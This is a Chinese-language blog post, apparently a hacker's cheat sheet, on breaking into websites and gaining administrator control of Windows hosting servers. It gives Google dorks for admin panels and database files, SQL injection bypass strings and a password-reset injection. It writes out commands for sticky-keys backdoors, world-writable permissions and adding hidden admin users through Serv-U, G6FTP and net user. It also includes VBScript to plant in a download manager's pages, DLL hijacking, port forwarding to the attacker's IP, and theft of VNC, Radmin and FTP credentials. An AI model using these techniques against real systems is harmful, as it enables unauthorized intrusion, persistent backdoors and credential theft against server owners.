踩点 PING命令ping系统 TTL=32 9X/ME
TTL=64 LINUX
TTL=128 2000X/XP
TTL=255 UNIX
1.对域名、ip、注册信息、同ip多网站的踩点
ip138 ip
ip866 注册信息 收录
打开http://whois.chinaz.com/Default.aspx
是什么类型的 asp 还是 php 还jsp 看能不能直接找到后台
右击看下图片路径 猜站点后台根目录 有时候还可以看出是什么上传
直接后台上传(像这种 http://www.xxx.com/uploadfile/ 等等)
还是编辑器上传(像这种 http://www.xxx.com/admin/uploadfile/ 等等) 有时候直接暴露eweb
试试注入 啊D配合google 批量搜索 site:xxx.com inurl:asp?id=
试试找编辑器 google搜索 site:xxx.com inurl:ewebeditor
类似的还有 editor/ewebedit/
FCKeditor/cuteeditor/
syWebEditor/
fck/eweb/
还可以通过搜索
site:xxx.com inurl:/upload
/upfile
/Uploads
/Upfiles
/Uploadfile
/filemanager
/Uploadfile08
/Uploadfile12
/*+Uploads
/Files
还有试试 上传漏洞 有时候不需要可以可以上传 自己抓包 改包 或者修改上传路径 欺骗上传
自己猜一下后台
http://www.***.com/admin
还可以手动试试/login /manage /manager /admin_login /login_admin /system /master /boss
利用google找后台:
site:xxx.com inurl:admin
类似的还有 inurl:login/admin/manage/manager/admin_login/login_admin/system/boss/master
site:www.***.com intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|manage|admin|login|system
site:www.***.com intitle:管理|后台|登陆|
通过google找重要文件
site:xxx.com inurl:robots.txt 这个也可能找得到后台
site:xxx.com inurl:robots.txt
site:xxx.com filetype:mdb
site:xxx.com filetype:ini
site:xxx.com inurl:txt
site:xxx.com filetype:.bak
site:xxx.com filetype:asmx
inurl:webservices|webservice|service|services
site:xxx.com filetype:php
site:xxx.com filetype:asp
博主点评:上面讲述了google hack的常用方法,主要目的是为了收集信息。
我补充一点关于bing搜索有关的:新手朋友们常常会遇到旁站很多的,这个时候最好拿aspx下手
而bing搜索的强大就能体现了。搜索旁站是否支持aspx ip:xxx.xxx.xxx.xxx aspx 同理你也可以构造类似的语句。
利用工具扫网站检测注入、xss、目录 还有可能扫到别人的shell
试试扫注入 jsky/wvs/awvs
试试扫目录 wwwscan/jsky/wvs/awvs 查看铭感目录
试试扫XSS wwwscan/jsky/wvs/awvs 通过xss掉网站账号
如果扫到别人的shell
先利用社会工程学 猜根据shell的名字 shell登陆信息 还不行
用 爆破工具去爆破 webshell爆破软件 、不然溯雪也可以
在找其他的方法入侵
还是无法入侵 给大家一条建议;实在拿不下可以 利用google 采取迂回策略
看手法
google搜索:
格式 自己的shell的信息 换下面的信息 如果shell
名字叫做 keio.asp
标题叫做:旁注-网站小助手
中间的文字中有: 本文保存的绝对路径
google搜索:
inurl:/keio.asp
intitle :旁注-网站小助手
intext : 本文保存的绝对路径
用iis扫描一下 iis读写权限
namp扫描 一下端口开放情况
根据namp扫描的信息
利用hscan扫描弱口令 或者流光也可以
开了21可以试一下ftp爆破
开了3389还可以试一下 3389简单爆破
试试旁注 一般旁注都可以拿到一个shell权限 在利用一些 提权利器提权
xiaoA.exe pr.exe 巴西.exe MS 等等
利用echo 或者 copy 一个shell到目标网站
如果旁注拿到一个网站的shell但提权不上 而目标网站有 编辑器的话
可以上传 一个test.asp 内容如下
<%Session(“eWebEditor_User”) = “11111111″%>
先访问下test.asp 在访问目标站点的ewebeditor后台的文件 说不定能进去
不行用vbs获取iis配置信息也可以
不然通过第三方软件提权
lpk提权
替换软件提权
asp的shell记得配合啊D的扫可写可读目录 aspx的shell 配合欧欧的 扫可写可读目录
cmd.exe 可以 改成cmd.com / cmd.db / cmd.txt 也可以运行
还可以找 网站配置信息 sa 或者 mysql 的相关密码 有时候是私人服务器
还可以通过下数据库 破服务器各个网站的密码社工
asp的 inc/conn.asp
conn.asp
config.asp
aspx的 Web.Config
inc/conn.asp
conn.asp
config.asp
还有一些 log ini文件 txt文件 记得多看看 说不定记录有密码
旁注不行 用C段
收集信息从始至终 社工很重要
有很多网站都是有源码下载的 或者一些oday、exp
自己搭建环境 找后台路径 数据库路径 再去迂回入侵
一些整理的资料
找到后台 试试用Cookie欺骗进入网站管理后台
试试万能密码
asp的
‘ or”=’
‘ or 1=1–
‘ or ‘a’='a–
‘or’='or’
” or 1=1–
or 1=1–
or ‘a=’a
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
) or (1=1
‘or”=’
php万能密码
(’ or 1=1 – , ‘ or 1=1 # 和‘ or 1=1 /*)
User: something
Pass: OR 1=1
jsp 万能密码
1or1=1
admin OR 1=1/*
1′or’1′=’1
‘or’='or’
有时候可能直接绕过
博主补充:万能密码这里如果遇到没有验证码的情况,完全可以用burp进行批量攻击,反正比一个个试快。
1.
已知后台目录:http://www.xxx.com/admin
直接跳转登陆页面:http://www.xxx.com./admin (注意中间加的一点)
直接进入登陆页面
2.
比如:http://allyesno.cnblogs.com/admin/login.aspx
如果输入密码错误返回到http://allyesno.cnblogs.com/admin/error.aspx
如果输入http://allyesno.cnblogs.com/admin%5Cindex.aspx 说不定可以饶过验证。
3.md5破解不出 :改密码试试
http://注入网址;update admin set password=’新MD5密码’ where password=’旧MD5密码’– [admin为表名.]
****************************************提权篇-**************************
———————————–第一.自身漏洞提权———————
0.先查看组建 端口 能执行cmd就看服务:net start
net 不行就用net1 不行就自己上传一个net到可写可读目录
脚本也探测下支不支持aspx jsp php
1.先利用 提权利器 提权 组建支持 直接cmd.exe 命令 拒绝访问 自己上传cmd.exe到可写可读目录 执行命令
还是拒绝 上传command.com 或者将cmd.exe 改名cmd.com 或者cmd.db或cmd.txt 上传
2. 组建不支持 那就执行cmd2 还是不行 自己找可写可读目录 上传 cmd.exe 到可写可读目录 执行命令
还是拒绝 上传command.com 或者将cmd.exe 改名cmd.com 或者cmd.db或cmd.txt 上传
cmd可以执行命令了上传提权利器 xiaoA.exe pr.exe 巴西.exe MS fuck.exe e
上传 执行 有时候不能执行 把提权利器也改后缀上传 .com .mdb .txt
3. 试试serv通杀7.8.9版本提权
4. aspx 自带的 iis_spy 列举 跨过去 不能跨就 echo 或 copy
5. 修改文件权限 cacls E:\index.asp /t /e /c /g interactive:f
权限设置
cacls.exe c: /e /t /g everyone:F #把c盘设置为everyone可以浏览
cacls.exe d: /e /t /g everyone:F #把d盘设置为everyone可以浏览
cacls.exe e: /e /t /g everyone:F #把e盘设置为everyone可以浏览
cacls.exe f: /e /t /g everyone:F #把f盘设置为everyone可以浏览
cacls d:\website /g everyone /e /t授与完全控制
6. 通过一个lml.vbs列目录脚本 列出所有网站路径:
lml.vbs脚本内容:
On Error Resume Next
If (LCase(Right(WScript.Fullname,11))=”wscript.exe”) Then
Msgbox Space(12) & “IIS Virtual Web Viewer” & Space(12) & Chr(13) & Space(9) & ” Usage:Cscript vWeb.vbs”,4096,”Lilo”
WScript.Quit
End If
Set ObjService=GetObject(“IIS://LocalHost/W3SVC”)
For Each obj3w In objservice
If IsNumeric(obj3w.Name) Then
Set OService=GetObject(“IIS://LocalHost/W3SVC/” & obj3w.Name)
Set VDirObj = OService.GetObject(“IIsWebVirtualDir”, “ROOT”)
If Err <> 0 Then WScript.Quit (1)
WScript.Echo Chr(10) & “[" & OService.ServerComment & "]”
For Each Binds In OService.ServerBindings
Web = “{ ” & Replace(Binds,”:”,” } { “) & ” }”
WScript.Echo Replace(Split(Replace(Web,” “,”"),”}{“)(2),”}”,”")
Next
WScript.Echo “Path : ” & VDirObj.Path
End If
Next
保存
执行 /c cscript d:\freehost\xxx\web\lml.vbs
不行的话 自己上传一个 cscript.exe到可读可写目录 在执行一次看行不行
5.利用
6. 安装5次shift后门,沾滞键后门,替换SHIFT后门:
5次SHIFT,沾滞键后门:
copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
替换SHIFT后门:
attrib c:\windows\system32\sethc.exe -h -r -s
attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
del c:\windows\system32\sethc.exe
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h +r +s
attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
—————————有控制权限的目录———————
有erveryone完全控制的目录 具有可写可读权限 自己可以上传啊D 和欧欧的 读可写可读目录的脚本
1.c:\winnt\system32\inetsrv\data\
是 erveryone完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行
2.第3方软件的写日志目录‘log’普遍存在可写可执行权限
3.C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\
博主补充:博主一篇文章中有关于提权敏感目录和注册表位置中有详细的介绍
文章在法客周年庆的提权文章里面http://edu2b.sinaapp.com/?p=691
——————————第3:第三方软件提权————————–
记住 用lpk.dll劫持添加用户利用文件提权
将lpk.dll放到任意目录
执行当前目录里的任意exe(最好是第三方程序)
系统就会添加一个账号
去开始程序拿下 下载快捷方式 到本地电脑查看第三方软件路径
找到路径 看能跳转进去
C:\
D:\
C:\Program Files\
D:\Program Files\ 一般安装地方软件路径都在他们下面 不过也有
1.paanywhere
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 一般 host目录 下他的 GIF
文件,在本地安装 pcanywhere上去
2.Serv-U, 如果有权限修改 ServUDaemon.ini,加个用户上去,密码为空
[USER=WekweN|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYvalues=
这个用户具有最高权限,然后我们就可以 ftp上去
quote site exec net.exe user hk pass /add
quote site exec net.exe localgroup administrators hk/add
3. VNC提权 利用
shell 读取 vnc 保存在注册表中的密文,然后再使用工具VNC4X破解。
VNC4
注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
Radmin 默认端口是4899,
Regedit/e c:\123.txt HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\HKLM/SOFTWARE/Real VNC/winVNC4/portnumber 端口位置
VNC3 如下位置:
HKCU/software/orl/winVNC3/portnamber
HKCU/software/orl/winVNC3/password
读出来的都是10禁止的 需转换16禁制
VNC密码破解软件 VNCX.exe -w 2位 2位 的输入账号密码 cain 直接输入全部 然后VNC登陆工具登陆
4. FlashFXP 提权
找到 FlashFXP下的 Sites. dat 这个文件(编辑) 看有没有密码 有密码 就下载下来有时候stats.bat sites。bat quick.bat 全下下来 替换
flashfxp 文件夹的相应文件。打开 flashfxp 在站点中打开站点管理器 得到加密ftp密码 用xp星号密码查看器查看明文
5.搜狗输入法 PinyinUp.exe 提权:
搜狗输入法的“PinyinUp.exe”是可读可写的直接替换即可,位于搜狗安装目录下,例如:
“C:\Program Files\SogouInput\5.0.0.3819\PinyinUp.exe”
搜狗拼音输入法,会定时调用这个文件进行升级,禁止还禁止不掉,呵呵,天然的后门。
6. QQ 迅雷 BT 等工具的同目录提权
把此ws2help.dll文件放到QQ 迅雷 BT 等工具的同目录 会提权
迅雷提权2
安装目录下的geturl.htm getAllurl.htm 里面加入代码,其实也很渺茫。
<script language=”VBScript”>
Set vbs=CreateObject(“Wscript.Shell”)
vbs.run “cmd /c net user 用户名 密码 /add”,0
vbs.run “cmd /c net localgroup administrators 用户名 /add”,0
</script>
进行提权
7.G6FTP提权
打开RemoteAdmin目录的Remote.ini文件,可查到管理员
32位MD5加密的密文,破解admin 一般不能直接连
需要端口转发 比如 Fpipe -l 28 -r 8021
然后连接他的 28端口
练上去 添加用户 设置E盘所有权限
然后 site commands (就是添加命令
command: hacker
description: hacker
EXEcute: 添加一个1.bat的批处理)
然后连接ftp
执行 quote hacker 就会执行1.bat
1.bat 的内容
net user keio keio.asd /add & net localgroup administrators keio /add
8.radmin提权 技巧
默认密码 注册表位置
HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/V2.0/server/parameters/parameter
默认端口位置
HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/V2.0/server/parameters/port
Regedit /e C:/radmin.reg HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/V2.0/server/parameters
利用注册表到处 radmin信息 之后查看密码 登陆上去 hash可以不破解 一png radmin hash 版登陆输入hash
radmin 3.0提权
将winmm.dll 放到radmin3.x目录下 下次登陆会自动记录账号
记录文件在 C:/windows/system32/ramin.log
查看就可以
9.leap ftp提权
下载sites.ini 覆盖本地 的就能找到ftp账号密码 用密码星号查看器
8.WinWebMail 提权加用户:
WinWebMail目录下的web必须设置everyone权限可读可写,在开始程序里,找到WinWebMail快捷方式,接下来,看路径,访问“路径\web”传 shell,访问shell后,权限是system,直接放远控进启动项,等待下次重启。
没有删cmd组件的可以直接加用户,7i24的web目录也是可写,权限为administrator。
9. 14147 FileZilla Server 提权 FileZilla+Server+Interface.xml这个文件存放了端口 密码等信息
先转下端口 不然不能直接连
本机 lcx.exe -listen 456 458
服务器上 lcx.exe 我的外网ip 456 127.0.0.1 服务器ip 14147
本地安装filezilla server 打开软件 连接到服务器 ip输入127.0.0.1 端口些458
输入之前找 的 账号密码 进去之后 用户配置 添加用户 共享目录 设置权限 全勾上
替换服务器提权 上传启动项提权 不能想serv-u一样执行目命令提权
10.3389全拼输入法漏洞:
Ctrl+Shift”组合键,快速切换至全拼输入法 用鼠标右键点击状态条上的微软徽标,选取“帮助”(呈灰色说明打了补丁)中的“操作指南”,在“输入法操作指南”的左上角点击鼠标右键,在弹出的菜单中选 择“跳至URL(J)…”输入C:\WinNT\System32 找到net.exe,并为net.exe创建一个快捷方式 确定 取“属性”,在“目标”中的c:\winnt\system32\net.exe user keio keio123 /add & net.exe localgroup administrators keio /add
没有评论:
发表评论